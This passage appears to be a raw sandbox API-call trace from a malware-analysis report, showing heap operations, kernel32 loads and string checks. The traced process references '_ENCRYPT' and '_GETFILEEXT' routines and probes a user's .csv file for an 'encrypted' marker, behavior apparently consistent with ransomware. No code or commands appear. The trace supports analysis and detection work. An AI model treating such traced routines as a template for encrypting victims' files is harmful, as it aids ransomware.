hHeap=0x770000) returned 1 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0034.606] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0034.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0034.607] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.607] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0034.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.608] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.608] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.608] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.608] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0034.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8898e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0034.609] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.609] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0034.609] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0034.609] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0034.609] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.609] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0034.609] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0034.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.609] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.610] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c5448 [0034.610] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.610] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.610] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b364200, ftCreationTime.dwHighDateTime=0x1d5c063, ftLastAccessTime.dwLowDateTime=0x8e9b3a70, ftLastAccessTime.dwHighDateTime=0x1d5bff8, ftLastWriteTime.dwLowDateTime=0x8e9b3a70, ftLastWriteTime.dwHighDateTime=0x1d5bff8, nFileSizeHigh=0x0, nFileSizeLow=0x158e5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="NC9n Uj.csv", cAlternateFileName="NC9NUJ~1.CSV")) returned 0x7c20c0 [0034.610] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.610] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0034.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0034.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.611] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b364200, ftCreationTime.dwHighDateTime=0x1d5c063, ftLastAccessTime.dwLowDateTime=0x8e9b3a70, ftLastAccessTime.dwHighDateTime=0x1d5bff8, ftLastWriteTime.dwLowDateTime=0x8e9b3a70, ftLastWriteTime.dwHighDateTime=0x1d5bff8, nFileSizeHigh=0x0, nFileSizeLow=0x158e5, dwReserved0=0x0, dwReserved1=0x777648, cFileName="NC9n Uj.csv", cAlternateFileName="NC9NUJ~1.CSV")) returned 0x7c20c0 [0034.611] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.611] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.611] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 